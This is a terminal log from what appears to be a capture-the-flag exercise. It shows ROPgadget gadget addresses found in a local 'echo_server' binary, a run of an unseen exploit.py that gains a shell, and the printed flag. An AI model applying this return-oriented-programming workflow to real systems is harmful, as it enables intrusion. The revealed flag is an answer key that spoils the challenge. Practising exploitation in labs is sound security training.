└─$ ROPgadget --binary ./echo_server --only 'pop|ret' Gadgets information ============================================================ 0x000000000040091c : pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret 0x000000000040091e : pop r13 ; pop r14 ; pop r15 ; ret 0x0000000000400920 : pop r14 ; pop r15 ; ret 0x0000000000400922 : pop r15 ; ret 0x000000000040091b : pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret 0x000000000040091f : pop rbp ; pop r14 ; pop r15 ; ret 0x0000000000400630 : pop rbp ; ret 0x0000000000400923 : pop rdi ; ret 0x0000000000400921 : pop rsi ; pop r15 ; ret 0x000000000040091d : pop rsp ; pop r13 ; pop r14 ; pop r15 ; ret 0x0000000000400541 : ret 0x000000000040074c : ret 0xb8 0x000000000040089a : ret 0xfffc
└─$ python exploit.py [+] Starting local process './echo_server': pid 296340 [*] Switching to interactive mode ========= echo server ========= This is an echo server. It will echo whatever you type. But not something like: /bin/sh cat /home/ctf/flag =============================== > $ cat flag MyFirstCTF{T4k3_1t_iF_u_w4nt_t0_us3_sIng13_ROPch41n}